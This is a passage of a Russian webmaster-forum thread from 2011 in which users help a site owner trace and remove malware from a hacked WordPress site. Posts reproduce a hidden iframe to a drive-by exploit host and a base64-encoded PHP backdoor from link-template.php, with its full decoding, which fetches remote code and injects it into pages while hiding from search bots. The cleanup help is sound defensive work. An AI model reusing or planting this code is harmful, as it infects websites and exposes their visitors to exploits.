Перейти к содержимому


Пользователь месяца
magnet magnet 1-й за Январь
Очков активности: 621 0 тем, 69 сообщений, 6 баллов репутации
Сайт: rbfxdirect.com
ТОП самых активных за этот месяц
  • Фотография BLIK
    #1

    BLIK
    Очков активности: 472.5 0 тем, 35 сообщений, 9 баллов репутации

  • Фотография Андрей WPMasterKZ
    #2

    Андрей WPMasterKZ (wpmaster.kz)
    Очков активности: 420 Вне конкурса за определение пользователя месяца

  • Фотография ShowPrint
    #3

    ShowPrint (ShowPrint.ru)
    Очков активности: 396 Вне конкурса за определение пользователя месяца

  • Фотография OlgaGetman
    #4

    OlgaGetman
    Очков активности: 390 Вне конкурса за определение пользователя месяца

  • Фотография Ixman
    #5

    Ixman (o5cat.ru)
    Очков активности: 306 Вне конкурса за определение пользователя месяца

  • Фотография Mandarin
    #6

    Mandarin
    Очков активности: 210 0 тем, 28 сообщений, 5 баллов репутации

  • Фотография r0mZet
    #7

    r0mZet (rz-style.ru)
    Очков активности: 102 0 тем, 17 сообщений, 4 балла репутации

  • Фотография magnet
    #8

    magnet (rbfxdirect.com)
    Очков активности: 43.5 Вне конкурса за определение пользователя месяца

  • Фотография WGN
    #9

    WGN (worldgamenews.com)
    Очков активности: 40.5 0 тем, 27 сообщений, 1 балл репутации

  • Фотография player09
    #10

    player09
    Очков активности: 37.5 3 темы, 16 сообщений, 1 балл репутации

  • Показать весь ТОП 10

Новый Teasernet

Поддержите форум! =)
Апдейты
  • Яндекс ИКС: 25.12.2018
  • Яндекс выдача: 16.02.2019
Топ 5 участников по репутации


С сайта поперли вирусы (стр. 2)

#21 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0
0

Отправлено 09 February 2011 - 13:14

Нет, базу пока не надо, давайте с файлами разберемся.
Много плагинов сейчас подключено.

Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия.
  • 0

#22 softgaz

softgaz
    Topic Starter
  • Неактивные
  • 14 сообщений
  • Репутация: 0

Отправлено 09 February 2011 - 13:25

Нет, базу пока не надо, давайте с файлами разберемся.
Много плагинов сейчас подключено.

Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия.


Естественно, это понятно: реальные скрипты

Нет, базу пока не надо, давайте с файлами разберемся.
Много плагинов сейчас подключено.

Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия.


Отправил - заранее огромнейшее спасибо!!!
  • 0

#23 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 February 2011 - 15:53

softgaz, проверил все на наличие распространенных видов, способов подгрузки стороннего кода.
Так же прогнал сайт через несколько сервисов и программ.
Ничего подозрительного не нашел.

На данный момент у меня антивирус не ругается на Ваш сайт.
У Вас есть сейчас сообщения о вирусе, блокировка сайта?
  • 0

#24 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 February 2011 - 22:01

softgaz, вчера ,когда Вы начали данную тему у Вас действительно на сайте был вирус.
На данный момент мой антивирус не выдает уже сообщений о вирусе.
Возможно, Вы сами еще с утра в результате замены ,обновлении текущей темы удалили его.
Либо произвели еще какие-либо действия.

Пишите еще раз в Яндекс, 90% что вируса на данный момент нет. ;)
  • 0

#25 surfer

surfer
  • Заблокированные
  • 1956 сообщений
  • Репутация: 71

Отправлено 09 February 2011 - 22:04

есть вирус ;) ты хостеру писал?
  • 0

#26 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 February 2011 - 22:09

есть вирус ;) ты хостеру писал?



Да, действительно, сейчас повторно зашел и началось
  • 0

#27 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 February 2011 - 22:15

Вот собственно лог журнала:

09.02.2011 22:12:46 Фильтр HTTP файл http://ladygaga.ipq.co/games/pdf2.php?f=23 JS/Exploit.Pdfka.OQD троянская программа соединение прервано - изолирован KISMEDIA\Юрий Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Opera\opera.exe.
  • 0

#28 surfer

surfer
  • Заблокированные
  • 1956 сообщений
  • Репутация: 71

Отправлено 09 February 2011 - 22:24

он самый, может через сервак бьют, писал хостеру?
ну есчо через скрипт могут, надо проверить версию ВП, плагины какие стоят
свою машину проверял?
  • 0

#29 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 February 2011 - 23:13

Нашел я твой код в исходнике страницы:

<!-- RSS -->
<div id="header-rss"><a href="http://www.softgaz.ru/?feed=rss2">Подписка на RSS</a></div>
<div id="header-comments"><iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe><a href="http://www.softgaz.ru/?feed=comments-rss2">Комментарии RSS</a></div>

<!-- Categories -->


Реально Фрэйм пропустил, пропарил, да и хорошо он вообще замаскирован, вклинился прямо в часть кода, не где-то там сбоку.

Правда, архив твоей темы у меня на работе остался, а со своего сервера ты уже его удалил.
Можешь сам его найти и убрать. ;)

Убрать нужно это:

<iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>


Возможно в файле header.php

P.S. Понял почему я его не нашел, по-ходу все-таки подгружается он у тебя динамически в шаблон.
То он есть, то его нет.
Завтра просканирую еще раз весь твой архив.

surfer правильно говорит:

он самый, может через сервак бьют, писал хостеру?
ну есчо через скрипт могут, надо проверить версию ВП, плагины какие стоят
свою машину проверял?


Если такая хрень хитрая, прячится еще постоянно, все нужно проверять.
Хостеру напиши!
  • 0

#30 softgaz

softgaz
    Topic Starter
  • Неактивные
  • 14 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 07:52

Нашел я твой код в исходнике страницы:

<!-- RSS -->
<div id="header-rss"><a href="http://www.softgaz.ru/?feed=rss2">Подписка на RSS</a></div>
<div id="header-comments"><iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe><a href="http://www.softgaz.ru/?feed=comments-rss2">Комментарии RSS</a></div>

<!-- Categories -->


Реально Фрэйм пропустил, пропарил, да и хорошо он вообще замаскирован, вклинился прямо в часть кода, не где-то там сбоку.

Правда, архив твоей темы у меня на работе остался, а со своего сервера ты уже его удалил.
Можешь сам его найти и убрать. ;)

Убрать нужно это:

<iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>


Возможно в файле header.php

P.S. Понял почему я его не нашел, по-ходу все-таки подгружается он у тебя динамически в шаблон.
То он есть, то его нет.
Завтра просканирую еще раз весь твой архив.

surfer правильно говорит:


Если такая хрень хитрая, прячится еще постоянно, все нужно проверять.
Хостеру напиши!



Мужики, просто не знаю, как вас благодарить!
Но кода вируса в РНР я не нашел! Поэтому просто убрал эту строчку в header.php
Но по всему получается, что этот вирус сидит в базе...
  • 0

#31 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 08:29

Мужики, просто не знаю, как вас благодарить!
Но кода вируса в РНР я не нашел! Поэтому просто убрал эту строчку в header.php
Но по всему получается, что этот вирус сидит в базе...


Сегодня проверю еще весь твой архив, вместе с плагинами. Возможно там где сидит основной код, который "долбит" тему.
Наверняка в зашифрованном виде.
Но уже проще, мы знаем результат его работы, что именно искать.

Но кода вируса в РНР я не нашел!


Я уже на это и не расчитывал когда писал P.S. , не все так просто.
  • 0

#32 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 11:31

Открой вот этот файл \wp-includes\link-template.php

Найди:

eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCJvYl9zdGFydCIpICYmICFmdW5jdGlvbl9leGlzdHMoInpveGdf
cm9kIikgJiYgIWZ1bmN0aW9uX2V4aXN0cygiZW1wcl9heGYiKSAmJiAhZnVuY3Rpb25fZXhpc3RzKCJx
b
2d1bV9ubmMiKSAmJiAhaXNzZXQoJEdMT0JBTFNbImJiZiJdKSAmJiBAc3RycG9zKHN0cnRvbG93ZXIoJ
F
9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSwiZ29vZ2xlYm90IikgPT09IGZhbHNlICYmIEBzdHJwb3
M
oc3RydG9sb3dlcigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pLCJtc25ib3QiKSA9PT0gZmFsc2U
g
JiYgQHN0cnBvcyhzdHJ0b2xvd2VyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSksInlhaG9vIikg
P
T09IGZhbHNlICYmICFpc3NldCgkX0NPT0tJRVsidHBrIl0pICl7JEdMT0JBTFNbImJiZiJdID0gMTtzZ
X
Rjb29raWUoInRwayIsIDEsIHRpbWUoKSszNjAwKjI0KjEsICIvIik7ICAgICAgICAgICAgZnVuY3Rpb2
4
gZW1wcl9heGYoJGd6ZW5jb2RlX2FyZykNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICA
g
ICAgICR4ID0gQG9yZChAc3Vic3RyKCRnemVuY29kZV9hcmcsIDMsIDEpKTsNCiAgICAgICAgICAgICAg
I
CAgICAgJHNoaWZ0ID0gMTA7DQogICAgICAgICAgICAgICAgICAgICRzaGlmdDIgPSAwOw0KICAgICAgI
C
AgICAgICAgICAgICBpZiggJHgmNCApDQogICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgIC
A
gICAgICAgICAgICR1bnBhY2s9QHVucGFjaygidiIsIHN1YnN0cigkZ3plbmNvZGVfYXJnLCAxMCwgMik
p
Ow0KICAgICAgICAgICAgICAgICAgICAgICAgJHVucGFjaz0kdW5wYWNrWzFdOyAkc2hpZnQrPSAyICsg
J
HVucGFjazsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmO
C
ApDQogICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICRzaGlmdCA9IE
B
zdHJwb3MoJGd6ZW5jb2RlX2FyZywgY2hyKDApLCAkc2hpZnQpICsgMTsNCiAgICAgICAgICAgICAgICA
g
ICAgfQ0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmMTYgKQ0KICAgICAgICAgICAgICAgICAgICB7
D
QogICAgICAgICAgICAgICAgICAgICAgICAkc2hpZnQgPSBAc3RycG9zKCRnemVuY29kZV9hcmcsIGNoc
i
gwKSwgJHNoaWZ0KSArIDE7DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICAgIC
A
gaWYoICR4JjIgKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICA
k
c2hpZnQgKz0gMjsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICAkZ3pp
c
CA9IEBnemluZmxhdGUoQHN1YnN0cigkZ3plbmNvZGVfYXJnLCAkc2hpZnQpKTsNCiAgICAgICAgICAgI
C
AgICAgICAgaWYoJGd6aXAgPT09IEZBTFNFKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgIC
A
gICAgICAgICAgICAgICAkZ3ppcCA9ICRnemVuY29kZV9hcmc7DQogICAgICAgICAgICAgICAgICAgIH0
N
CiAgICAgICAgICAgICAgICAgICAgcmV0dXJuICRnemlwOw0KICAgICAgICAgICAgICAgIH0NCg0KICAg
I
GZ1bmN0aW9uIHFvZ3VtX25uYyggJHVybCApIHsNCg0KLyogICAgICBpZiAoZnVuY3Rpb25fZXhpc3RzK
C
JjdXJsX2luaXQiKSkNCiAgICAgICAgew0KICAgICAgICAgICRjaCA9IGN1cmxfaW5pdCgkdXJsKTsNCi
A
gICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQogICA
g
ICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7DQogICAgICAgICAgICAk
Y
3VybF9yZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7DQogICAgICAgICAgICBjdXJsX2Nsb3NlKCRjaCk7D
Q
ogICAgICAgICAgICBpZiAoJGN1cmxfcmVzdWx0KSByZXR1cm4gJGN1cmxfcmVzdWx0Ow0KICAgICAgIC
B
9DQoNCiAgICAgICAgaWYgKEBpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSkNCiAgICAgICAgew0KICA
g
ICAgICAgICAgJGZpbGVfcmVzdWx0ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCR1cmwpOw0KICAgICAgICAg
I
CAgaWYgKCRmaWxlX3Jlc3VsdCkgcmV0dXJuICRmaWxlX3Jlc3VsdDsNCiAgICAgICAgfSAgICovDQoNC
i
AgICAgICAgJHVybF9pbmZvID0gcGFyc2VfdXJsKCR1cmwpOw0KICAgICAgICAkcXVlcnkgID0gIkdFVC
A
kdXJsIEhUVFAvMS4wXHJcbiI7DQogICAgICAgICRxdWVyeSAuPSAiSG9zdDogIiAuICR1cmxfaW5mb1s
i
aG9zdCJdIC4gIlxyXG4iOw0KICAgICAgICAkcXVlcnkgLj0gIkNvbm5lY3Rpb246IENsb3NlXHJcblxy
X
G4iOw0KICAgICAgICAkZnAgPSBAZnNvY2tvcGVuKCR1cmxfaW5mb1siaG9zdCJdLCA4MCwgJGVycm5vL
C
AkZXJyc3RyLCA1KTsNCiAgICAgICAgaWYgKCEkZnApIHJldHVybiBmYWxzZTsNCiAgICAgICAgQGZwdX
R
zKCRmcCwgJHF1ZXJ5KTsNCiAgICAgICAgQHNvY2tldF9zZXRfdGltZW91dCAoJGZwLCA1LCAwKTsNCiA
g
ICAgICAgJHNfcmV0Y29kZSA9IEBzdWJzdHIgKEBmZ2V0cyAoJGZwLCA0MDk2KSwgOSwgMyk7DQogICAg
I
CAgIGlmICgkc19yZXRjb2RlezB9IDw+ICIyIikge3JldHVybiBGQUxTRTt9DQogICAgICAgIHdoaWxlI
C
ghIEBmZW9mICgkZnApKQ0KICAgICAgICB7DQogICAgICAgICAgICBpZiAoIlxyXG4iID09PSBAZmdldH
M
gKCRmcCwgNDA5NikpIHticmVhazt9DQogICAgICAgIH0NCiAgICAgICAgJHNvY2tldF9yZXN1bHQgPSA
i
IjsNCiAgICAgICAgd2hpbGUgKCEgQGZlb2YgKCRmcCkpIHsNCiAgICAgICAgICAgICRzb2NrZXRfcmVz
d
Wx0IC49IEBmZ2V0cyAoJGZwLCA0MDk2KTsNCiAgICAgICAgfQ0KICAgICAgICBAZmNsb3NlKCRmcCk7D
Q
ogICAgICAgIGlmICgkc29ja2V0X3Jlc3VsdCkgcmV0dXJuICRzb2NrZXRfcmVzdWx0Ow0KICAgIH0NCi
A
gICBmdW5jdGlvbiB6b3hnX3JvZCgkZW5mKXtnbG9iYWwgJGloZGVnX2J2ZztyZXR1cm4gcHJlZ19yZXB
s
YWNlKCIjKDwvdGFibGU+Lio8dGQ+fDwvdGFibGU+fDwvZGl2PltePD5dKjxkaXZbXjw+XSo+fDwvYm9k
e
T4pI2lzIiwgIiQxIiAuICRpaGRlZ19idmcsIGVtcHJfYXhmKCRlbmYpLCAxKTsNCiAgICB9JGloZGVnX
2
J2Zz1xb2d1bV9ubmMoYmFzZTY0X2RlY29kZSgiYUhSMGNEb3ZMMmRqYjNWdWRHVnlMbU51TDJsdVptOH
V
jR2h3IikgLiAiP2k9IiAuICRfU0VSVkVSWyJSRU1PVEVfQUREUiJdKTtAcHJlZ19tYXRjaCgiIzxvcGV
u
PiguKik8L2Nsb3NlPiMiLCAkaWhkZWdfYnZnLCAkbWF0Y2hlcyk7JGloZGVnX2J2Zz0gaXNzZXQoJG1h
d
GNoZXNbMV0pID8gJG1hdGNoZXNbMV0gOiAiIjtpZiAoJGloZGVnX2J2ZykgIG9iX3N0YXJ0KCJ6b3hnX
3
JvZCIpO30="));


Попробуй удалить этот кусок кода.

Сейчас еще попробую расшифровать эту хрень, для 100% уверенности.
  • 0

#33 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 11:40

Вот расшифровка, не знаю что это, но больше ничего подозрительного, кроме выше приведенного кода зашифрованного через Base64, я не нашел.

if(function_exists("ob_start") && !function_exists("zoxg_rod") && !function_exists("empr_axf") && !function_exists("qogum_nnc") && !isset($GLOBALS["bbf"]) && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"googlebot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"msnbot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"yahoo") === false && !isset($_COOKIE["tpk"]) ){$GLOBALS["bbf"] = 1;setcookie("tpk", 1, time()+3600*24*1, "/");			function empr_axf($gzencode_arg)
{
$x = @ord(@substr($gzencode_arg, 3, 1));
$shift = 10;
$shift2 = 0;
if( $x&4 )
{
$unpack=@unpack("v", substr($gzencode_arg, 10, 2));
$unpack=$unpack[1]; $shift+= 2 + $unpack;
}
if( $x&8 )
{
$shift = @strpos($gzencode_arg, chr(0), $shift) + 1;
}
if( $x&16 )
{
$shift = @strpos($gzencode_arg, chr(0), $shift) + 1;
}
if( $x&2 )
{
$shift += 2;
}
$gzip = @gzinflate(@substr($gzencode_arg, $shift));
if($gzip === FALSE)
{
$gzip = $gzencode_arg;
}
return $gzip;
}

function qogum_nnc( $url ) {

/* if (function_exists("curl_init"))
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$curl_result = curl_exec ($ch);
curl_close($ch);
if ($curl_result) return $curl_result;
}

if (@ini_get("allow_url_fopen"))
{
$file_result = @file_get_contents($url);
if ($file_result) return $file_result;
} */

$url_info = parse_url($url);
$query = "GET $url HTTP/1.0\r\n";
$query .= "Host: " . $url_info["host"] . "\r\n";
$query .= "Connection: Close\r\n\r\n";
$fp = @fsockopen($url_info["host"], 80, $errno, $errstr, 5);
if (!$fp) return false;
@fputs($fp, $query);
@socket_set_timeout ($fp, 5, 0);
$s_retcode = @substr (@fgets ($fp, 4096), 9, 3);
if ($s_retcode{0} <> "2") {return FALSE;}
while (! @feof ($fp))
{
if ("\r\n" === @fgets ($fp, 4096)) {break;}
}
$socket_result = "";
while (! @feof ($fp)) {
$socket_result .= @fgets ($fp, 4096);
}
@fclose($fp);
if ($socket_result) return $socket_result;
}
function zoxg_rod($enf){global $ihdeg_bvg;return preg_replace("#(</table>.*<td>|</table>|</div>[^<>]*<div[^<>]*>|</body>)#is", "$1" . $ihdeg_bvg, empr_axf($enf), 1);
}$ihdeg_bvg=qogum_nnc(base64_decode("aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw") . "?i=" . $_SERVER["REMOTE_ADDR"]);@preg_match("#<open>(.*)</close>#", $ihdeg_bvg, $matches);$ihdeg_bvg= isset($matches[1]) ? $matches[1] : "";if ($ihdeg_bvg) ob_start("zoxg_rod");}

  • 0

#34 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 12:01

Еще в теме e-storage-plus есть три больших вхождения eval(base64_decode
Но не думаю что они работают, тема активирована другая. Можешь удалить ее, все равно не используешь.
  • 0

#35 surfer

surfer
  • Заблокированные
  • 1956 сообщений
  • Репутация: 71

Отправлено 10 February 2011 - 12:03

данный кусок кода подключает http://gcounter.cn/info.php и отсюда идет атака
  • 0

#36 softgaz

softgaz
    Topic Starter
  • Неактивные
  • 14 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 12:04

Вот расшифровка, не знаю что это, но больше ничего подозрительного, кроме выше приведенного кода зашифрованного через Base64, я не нашел.


Удалил - все работает!
Но поступил проще: скопировал этот файл с другого своего сайта!
СПАСИБО ОГРОМНЕЙШЕЕ!!!!!!!!!
ПРОСТО НЕ ЗНАЮ - КАК БЛАГОДАРИТЬ!!!!!!!!!!
ПИВО ПРИ ВСТРЕЧЕ - ГАРАНТИРУЮ!!!!!!!!!!!!!
  • 0

#37 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 12:12

данный кусок кода примитивно подключает http://gcounter.cn/info.php


По этому адресу и есть вирус.
То есть работал он получается в несколько этапов.
Вначале подгружал http://gcounter.cn/info.php, а с него уже брал код вставки в исходник.
<iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>

Вполне возможно, что данный код еще и менялся постоянно, или исчезал на время, отследить тяжело.

Короче нормальную хрень ты подхватил! ;)
Я с таким, до этого не сталкивался, обычно вирус тупо прописывался в файлы шаблона.
  • 0

#38 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 12:27

Причем URL http://gcounter.cn/info.php зашифрован дважды.
$ihdeg_bvg=qogum_nnc(base64_decode("aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw")


Красивый вирусняк такой. ;)
  • 0

#39 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 13:22

Сообщение 33 , код посмотрите уже расшифрованный в конце.
  • 0

#40 softgaz

softgaz
    Topic Starter
  • Неактивные
  • 14 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 13:25

А почемы вы решили что дважды?


Я другое никак не пойму: а почему дата файла не поменялась?! Я ж все искал в соответствии с инструкциями Яндекса: смотри по датам изменения файлов! А они не поменялись - как такое возможно?
  • 0

robot

robot
  • Пользователь PRO
  • 2652 сообщений
  • Репутация: 85


Похожие темы

  Название темы Автор Статистика Последнее сообщение

Оформление форума – IPBSkins.ru